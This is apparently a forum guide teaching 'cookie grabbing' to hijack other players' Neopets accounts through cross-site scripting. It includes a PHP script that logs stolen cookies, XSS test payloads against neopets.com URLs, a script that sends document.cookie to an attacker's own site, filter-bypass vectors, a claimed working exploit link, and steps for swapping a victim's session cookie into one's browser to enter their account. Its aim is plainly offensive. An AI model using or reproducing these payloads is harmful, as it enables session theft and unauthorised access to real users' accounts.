Leet

1. [CENTER][IMG]http://i.imgur.com/z7oww.jpg[/IMG][/CENTER]
2.  
3. First off, thank you to Inq for giving me a couple accounts to cookie grab.
4.  
5. Secondly, thank you to Kyo for his expertise; most of what I've learned is from him. The rest, I learned along the way. Now, onto the guide.
6.  
7. Thirdly, yes. You really are looking at a cookie grabbing guide. No, this guide will not kill the market. But maybe this might in Level 3...? Doesn't matter anyway.
8.  
9. Cross-site scripting (XSS) is possible when a site has insecure coding. When websites allow us to interact with them (e.g. search box, comment boxes, etc) and don't keep it secure, they render themselves vulnerable to code injection.
10.  
11. Many CGers take advantage of this and employ PHP and Javascript to snag the cookies. XSS itself isn't needed to CG, however but is just a step away from PHP/JS.
12.  
13.  
14. [COLOR=#006400][SIZE=3][FONT=Book Antiqua][B]Requirements[/B][/FONT][/SIZE][/COLOR]
15. Basic knowledge of HTML
16. A website host (nearlyfreespeech, tech.coop, netfirms, etc)
17.  
18.  
19. [COLOR=#006400][SIZE=3][FONT=Book Antiqua][B]Writing the script[/B][/FONT][/SIZE][/COLOR]
20. People use PHP to retrieve the cookies and record it to a text file. A PHP script begins with [COLOR=#FF0000]<?php[/COLOR] and ends with [COLOR=#FF0000]?>[/COLOR].
21.  
22. [code]
23. <?php
24. header("Location: http://www.neopets.com/index.phtml");
25. [COLOR=#FF8C00]// This is a redirect link takes the user to the specified link
26. // after they view the page the cookie-grabbing code is on.[/COLOR]
27.  
28. $cookie = $_GET['cookie'];
29. [COLOR=#FF8C00]// This line sends data to the PHP file using the GET command.
30. // The data is named ‘cookie’.[/COLOR]
31.  
32. $file = fopen('log.txt', 'a');
33. [COLOR=#FF8C00]// This opens a file named log.txt. [/COLOR]
34.  
35. fwrite($file , 'cookie: '.$cookie);
36. [COLOR=#FF8C00] // This writes the ‘cookie’ to the file
37. [/COLOR]
38. fwrite($file , "\r\n");
39. [COLOR=#FF8C00]// This is a line break.
40. [/COLOR]
41. fclose($file);
42. [COLOR=#FF8C00]// This closes the file.
43. [/COLOR]?>
44. [/code]
45. Sending anyone the link to your website with the script in it (1) snags their cookies (2) records in a log (3) redirects them to whatever link specified.
46.  
47.  
48. [COLOR=#006400][SIZE=3][FONT=Book Antiqua][B]Finding an exploit[/B][/FONT][/SIZE][/COLOR]
49. In any place where you can input a value, add [COLOR=#FF0000]<script>alert('1')</script>[/COLOR] to see if the site allows javascript. If you get a popup, then the site is vulnerable.
50.  
51. (Note: The demonstrated exploit has been patched.)
52.  
53. Take for example the below and its corresponding result:
54. [code]
55. http://www.neopets.com/coregtest.php?wat=<script>alert(1)</script>[/code]
56. Bingo, a ‘1’ pops up.
57.  
58. [CENTER][IMG]http://i.imgur.com/KsKZM.png[/IMG][/CENTER]
59.  
60. Now try [COLOR=#FF0000]<script>alert(document.cookie)</script>[/COLOR]
61. [code]
62. http://www.neopets.com/coregtest.php?wat=<script>alert(document.cookie)</script>[/code]
63.  
64. Now you should have a popup that shows you your cookies. The highlighted portion is the neologin, which is the only information we need.
65.  
66. [CENTER][IMG]http://i.imgur.com/9HyA6.jpg[/IMG][/CENTER]
67.  
68. You don’t actually write the data to the server unless you inject a script that modifies the page on the server’s end. The only thing you change is how the dynamic page acts on your end. As a result when you send someone else the page, you have to send him or her the link with the injection already in that page.
69.  
70. Using this script will grab someone else’s cookies and log it on your site.
71. [code]
72. <script>document.location = 'http://www.yourwebsite.com/cger.php?cookie=' + escape(document.cookie);</script>[/code]
73.  
74. Unfortunately, document.cookie is blocked on Neopets. There are/have been ways around this and alternatives (not listed).
75.  
76.  
77. [COLOR=#006400][SIZE=3][FONT=Book Antiqua][B]Using the Cookies[/B][/FONT][/SIZE][/COLOR]
78. Now that you’ve got their cookies recorded, you need to use them. This is done by replacing your Neopets cookie with ttheir cookie. Fortunately, we have addons to make it easy for us to do that.
79.  
80. [URL="https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies-13793/"][COLOR=#C94B23]FIREFOX: Add 'n' Edit Cookies (Click)[/COLOR][/URL]
81. [URL="https://chrome.google.com/webstore/detail/fngmhnnpilhplaeedifhccceomclgfbg"][COLOR=#2A7537]Chrome: Edit This Cookie (Click)[/COLOR]
82. [/URL]
83. [COLOR=#C94B23][B]FIREFOX VERSION:[/B][/COLOR] [spoiler]
84.  
85. After downloading, go to Tools > Cookie Editor.
86.  
87. [CENTER][IMG]http://i.imgur.com/DX90A.png[/IMG][/CENTER]
88.  
89. Filter for Neopets. From there, the only thing you need to change is the [B]neologin[/B].
90.  
91. [CENTER][IMG]http://i.imgur.com/clxH5.png[/IMG][/CENTER]
92.  
93. Take the hash that’s recorded in your log and change your current neologin to that one. If everything’s done correctly, you should be in their account.
94.  
95. [CENTER][IMG]http://i.imgur.com/lGUlR.png[/IMG][/CENTER]
96. [/spoiler]
97. [COLOR=#2A7537][B]CHROME VERSION:[/B][/COLOR][spoiler]
98.  
99. Click the Cookie icon next to your address bar to reveal a drop down bar showing all the cookies for the page you are on. (This means that you must be on a Neopets page in order to see Neopets cookies.)
100.  
101. From there, the only thing you need to change is the [B]neologin[/B]. Click on it, take the hash that’s recorded in your log and change your current neologin to that one. If everything’s done correctly, you should be in their account.
102.  
103. [CENTER][IMG]http://i.imgur.com/H6Tog.png[/IMG][/CENTER]
104. [/spoiler]
105. [COLOR=#006400][SIZE=3][FONT=Book Antiqua][B]How Did People Place Cookie Grabbers Onsite?[/B][/FONT][/SIZE][/COLOR]
106.  
107. Above, we discussed CGing that involved having someone click on a link that took them to an offsite page to snag their cookies. But how did people CG in the last petpage scare? This was mostly due to an error on TNT's part; you were able to link offsite by manipulating the battledome stats. This, of course, has since been patched due to rampant abuse.
108. [code]<a href="http%#BD_LOSTA//google.com">TEXT</a>[/code]
109.  
110. Once upon a time in a very distant past, you were able to cookie grab simply with an image, before the word "javascript" was blocked.
111. [code]<img src="javascript:alert('1');">[/code]
112.  
113. In a similar fashion...
114. [code]<body background="javascript:alert('1')">[/code]
115.  
116. Getting into CSS a bit...
117. [code]<div style="background-image: url(javascript:alert('1'))">[/code]
118.  
119. If you try these now though, you'll notice that TNT has banned the word "javascript". Even its hex form (6a6176617363726970743a616c6572742827312729) and its ASCII form (106,97,118,97,115,99,114,105,112,116,58,97,108,101,114,116,40,39,49,39,41) are blocked. Still. There are ways. You just have to do some extra research, gain experience, and be clever.
120.  
121.  
122. [COLOR=#006400][SIZE=3][FONT=Book Antiqua][B]Conclusion[/B][/FONT][/SIZE][/COLOR]
123. Written by Leet. This is a basic guide on the steps involved and you could very well start CGing people by linking them offsite. Additionally, it seeks to educate you on past methods and enlighten you on the flexibility of Javascript placement. Keep in mind, the biggest issue is actually getting a working onsite CGer.
124.  
125. Of note, there [I]have[/I] been rumors that someone is working on a cookie grabber where simply clicking on a thread in the BD Chat/Pound Chat/Trade Chat gets you CG'd... [I]cough[/I]. But alas, it's simply a rumor.
126.  
127. And just a reminder, Kyo generously posted a free, working exploit.
128. [code]http://www.neopets.com/challenges/world_gallery.phtml?world_id=10&edit=1%20onmouseover=alert(1)[/code][/spoiler]